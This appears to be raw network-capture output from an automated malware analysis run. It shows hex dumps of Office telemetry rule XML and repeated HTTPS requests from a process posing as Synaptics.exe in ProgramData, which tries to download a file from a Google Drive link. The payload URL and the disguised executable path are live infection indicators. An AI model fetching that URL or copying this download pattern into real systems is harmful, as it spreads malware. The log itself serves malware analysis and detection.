                                                                                                            2024-11-15 10:24:40 UTC16384INData Raw: 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 30 31 31 37 76 30 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 30 31 31 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 38 79 6c 6c 66 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 3e 0d 0a 20 20 20 20 3c 56 20 56 3d 22 43 6c 69 63 6b 22 20 54 3d 22 57 22 20 2f 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32
                                                                                                            Data Ascii: /> </T></R><$!#>100117v0+<?xml version="1.0" encoding="utf-8"?><R Id="100117" V="0" DC="SM" T="Subrule" DCa="PSU" xmlns=""> <S> <UTS T="1" Id="8yllf" /> </S> <C T="W" I="0" O="false"> <V V="Click" T="W" /> </C> <C T="U32
                                                                                                            2024-11-15 10:24:41 UTC16384INData Raw: 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 54 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 32 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 20 54 3d 22 33 22 20 2f 3e 0d 0a 20 20 3c 2f 54 3e 0d 0a 3c 2f 52 3e 0d 0a 3c 24 21 23 3e 31 30 37 38 31 76 31 2b 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 37 38 31 22 20 56 3d 22 31 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 31 22 20 49 64 3d 22 62 67 6f 34 74 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 32 22 20 49 64 3d 22 62 68 6c 76 79 22 20 2f 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 49 33 32
                                                                                                            Data Ascii: </C> <T> <S T="2" /> <S T="3" /> </T></R><$!#>10781v1+<?xml version="1.0" encoding="utf-8"?><R Id="10781" V="1" DC="SM" T="Subrule" xmlns=""> <S> <UTS T="1" Id="bgo4t" /> <UTS T="2" Id="bhlvy" /> </S> <C T="I32
                                                                                                            2024-11-15 10:24:41 UTC16384INData Raw: 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 30 30 30 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 4c 45 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c
                                                                                                            Data Ascii: <L> <O T="GT"> <L> <S T="1" F="0" /> </L> <R> <V V="1000" T="U32" /> </R> </O> </L> <R> <O T="LE"> <
                                                                                                            2024-11-15 10:24:41 UTC16384INData Raw: 20 49 3d 22 32 32 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 56 69 64 65 6f 43 61 6c 6c 56 69 64 65 6f 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 36 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 33 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 53 61 53 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 32 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 43 3e 0d 0a 20 20 3c 2f 43 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 32 34 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 46 6c 79 6f 75 74 4f 76 65 72 66 6c 6f 77 22 3e 0d 0a 20 20 20 20 3c 43 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54
                                                                                                            Data Ascii: I="22" O="false" N="FlyoutVideoCallVideo"> <C> <S T="26" /> </C> </C> <C T="U32" I="23" O="false" N="FlyoutSaS"> <C> <S T="27" /> </C> </C> <C T="U32" I="24" O="false" N="FlyoutOverflow"> <C> <S T
                                                                                                            2024-11-15 10:24:41 UTC16384INData Raw: 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 30 39 30 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 45 4e 3d 22 4f 66 66 69 63 65 2e 4f 75 74 6c 6f 6f 6b 2e 44 65 73 6b 74 6f 70 2e 4e 44 42 2e 55 6e 6b 6e 6f 77 6e 2e 43 6f 72 72 75 70 74 69 6f 6e 22 20 41 54 54 3d 22 64 38 30 37 36 30 39 32 37 36 37 34 34 32 34 35 62 61 66 38 31 62 66 37 62 63 38 30 33 33 66 36 2d 32 32 36 38 65 33 37 34 2d 37 37 36 36 2d 34 39 37 36 2d 62 65 34 34 2d 62 36 61 64 35 62 64 64 63 35 62 36 2d 37 38 31 33 22 20 53 3d 22 31 30 30 22 20 44 43 61 3d 22 50 53 55 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 45 74 77 20 54 3d 22 31 22 20 45 3d 22 33 39 35 22 20 47 3d 22 7b 32 61 64 66 38 65 32 33 2d 30 61 66 39 2d
                                                                                                            Data Ascii: coding="utf-8"?><R Id="10907" V="0" DC="SM" EN="Office.Outlook.Desktop.NDB.Unknown.Corruption" ATT="d807609276744245baf81bf7bc8033f6-2268e374-7766-4976-be44-b6ad5bddc5b6-7813" S="100" DCa="PSU" xmlns=""> <S> <Etw T="1" E="395" G="{2adf8e23-0af9-
                                                                                                            2024-11-15 10:24:41 UTC16384INData Raw: 22 54 65 6c 65 6d 65 74 72 79 53 68 75 74 64 6f 77 6e 22 20 2f 3e 0d 0a 20 20 20 20 3c 55 54 53 20 54 3d 22 33 22 20 49 64 3d 22 62 70 66 79 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 34 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 47 54 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 50 68 6f 74 6f 53 69 7a 65 49 6e 42 79 74 65 73 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 30 22 20 54 3d 22 55 36 34 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55
                                                                                                            Data Ascii: "TelemetryShutdown" /> <UTS T="3" Id="bpfy1" /> <F T="4"> <O T="GT"> <L> <S T="3" F="PhotoSizeInBytes" /> </L> <R> <V V="0" T="U64" /> </R> </O> </F> </S> <C T="U
                                                                                                            2024-11-15 10:24:41 UTC16384INData Raw: 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 34 22 20 46 3d 22 65 76 65 6e 74 49 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 31 33 35 22 20 54 3d 22 49 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 20 20 3c 46 20 54 3d 22 37 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 74 63 69 64 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20
                                                                                                            Data Ascii: <L> <S T="4" F="eventId" /> </L> <R> <V V="135" T="I32" /> </R> </O> </F> <F T="7"> <O T="EQ"> <L> <S T="5" F="tcid" /> </L> <R> <V
                                                                                                            2024-11-15 10:24:41 UTC16384INData Raw: 0d 0a 20 20 20 20 3c 46 20 54 3d 22 31 30 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 33 22 20 46 3d 22 46 69 6c 65 50 72 6f 74 65 63 74 69 6f 6e 53 74 61 74 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 35 22 20 54 3d 22 55 33 32 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 3c 2f 46 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 55 33 32 22 20 49 3d 22 30 22 20 4f 3d 22 66 61 6c 73 65 22 20 4e 3d 22 43 6f 75 6e 74 4f 66 54 68 72 6f 77 6e 45 78 63 65 70 74 69 6f 6e 22 3e 0d
                                                                                                            Data Ascii: <F T="10"> <O T="EQ"> <L> <S T="3" F="FileProtectionState" /> </L> <R> <V V="5" T="U32" /> </R> </O> </F> </S> <C T="U32" I="0" O="false" N="CountOfThrownException">
                                                                                                            2024-11-15 10:24:41 UTC16384INData Raw: 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 35 22 20 46 3d 22 72 65 73 75 6c 74 73 5f 49 73 4e 75 6c 6c 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 56 20 56 3d 22 66 61 6c 73 65 22 20 54 3d 22 42 22 20 2f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4f 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 52 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20
                                                                                                            Data Ascii: <S T="5" F="results_IsNull" /> </L> <R> <V V="false" T="B" /> </R> </O> </L> <R> <O T="EQ"> <L>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            42192.168.2.1649785142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:41 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:41 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:41 GMT
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-m2zkC3NgxTn4_8r2XJXq3w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AHmUCY2YPSzXo_UwscI0FbetXZetjMTwh_wBqDeFfckri-ekjuYkKerwgLE-eBw4W1JcFgPaUgmb3vb9fg
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
                                                                                                            Connection: close
                                                                                                            2024-11-15 10:24:41 UTC125INData Raw: 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 20 64 69 72 3d 6c 74 72 3e 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68
                                                                                                            Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width
                                                                                                            2024-11-15 10:24:41 UTC1378INData Raw: 22 3e 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 3c 73 74 79 6c 65 20 6e 6f 6e 63 65 3d 22 6e 4b 30 33 38 48 4d 65 74 37 71 69 6d 65 30 77 6f 61 65 2d 50 67 22 3e 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 63 6f 6c 6f 72 3a 23 32 32 32 3b 74 65 78 74 2d 61 6c 69 67 6e 3a 75 6e 73 65 74 3b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 30 70 78 3b 6d 69
                                                                                                            Data Ascii: "><title>Error 404 (Not Found)!!1</title><style nonce="nK038HMet7qime0woae-Pg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;mi
                                                                                                            2024-11-15 10:24:41 UTC149INData Raw: 69 6d 67 3e 3c 2f 73 70 61 6e 3e 3c 2f 61 3e 3c 70 3e 3c 62 3e 34 30 34 2e 3c 2f 62 3e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6e 20 65 72 72 6f 72 2e 3c 2f 69 6e 73 3e 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 20 3c 69 6e 73 3e 54 68 61 74 e2 80 99 73 20 61 6c 6c 20 77 65 20 6b 6e 6f 77 2e 3c 2f 69 6e 73 3e 3c 2f 6d 61 69 6e 3e
                                                                                                            Data Ascii: img></span></a><p><b>404.</b> <ins>Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            43192.168.2.1649784142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:41 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:41 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-V0csk4Wg_XwbwrBNkq52jQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            44192.168.2.1649786142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:41 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:41 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:41 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-bIegGmr9dg0VSI07Xf25OQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            45192.168.2.1649790142.250.185.784436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:42 UTC344OUTGET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Host: docs.google.com
                                                                                                            Cache-Control: no-cache
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:43 UTC1314INHTTP/1.1 303 See Other
                                                                                                            Content-Type: application/binary
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:42 GMT
                                                                                                            Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                            Strict-Transport-Security: max-age=31536000
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-X392AveldeziWoxPc2eCpA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Server: ESF
                                                                                                            Content-Length: 0
                                                                                                            X-XSS-Protection: 0
                                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                                            X-Content-Type-Options: nosniff
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Connection: close


                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                            46192.168.2.1649789142.250.185.654436056C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                            TimestampBytes transferredDirectionData
                                                                                                            2024-11-15 10:24:42 UTC387OUTGET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                            User-Agent: Synaptics.exe
                                                                                                            Cache-Control: no-cache
                                                                                                            Host: drive.usercontent.google.com
                                                                                                            Connection: Keep-Alive
                                                                                                            Cookie: NID=519=q1lrgPbFKCFyu9T66-I47plFxOcDwfVpLx1AMCfNBmcjVhw-lHFuRj4vTkQmEaNm3P5rkFiKGm8Y7Kh-YjhDVfZoa_nJ9BzX6mXcZUbqbT1yqaDMndMW1mfAPxxtETL9GO2a45cTllXcYq0IVEuvc0belUviCx4Nwnms2Hkkg8uxPlKHQA5ug14
                                                                                                            2024-11-15 10:24:43 UTC1253INHTTP/1.1 404 Not Found
                                                                                                            Content-Type: text/html; charset=utf-8
                                                                                                            Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                            Pragma: no-cache
                                                                                                            Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                            Date: Fri, 15 Nov 2024 10:24:42 GMT
                                                                                                            Content-Security-Policy: script-src 'report-sample' 'nonce-B65aVVSftE18NG4XnnqHmw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                            Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                            Cross-Origin-Opener-Policy: same-origin
                                                                                                            Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                            Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                            Content-Length: 1652
                                                                                                            X-GUploader-UploadID: AFiumC440Or8D_Xo1vkwy3oSVVMg4teih-up4EWiKSW4kKpvQ-WmgIZ2XEm6lGB-AQduE-eb_j7IIG0Lww
                                                                                                            Server: UploadServer
                                                                                                            Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                            Content-Security-Policy: sandbox allow-scripts
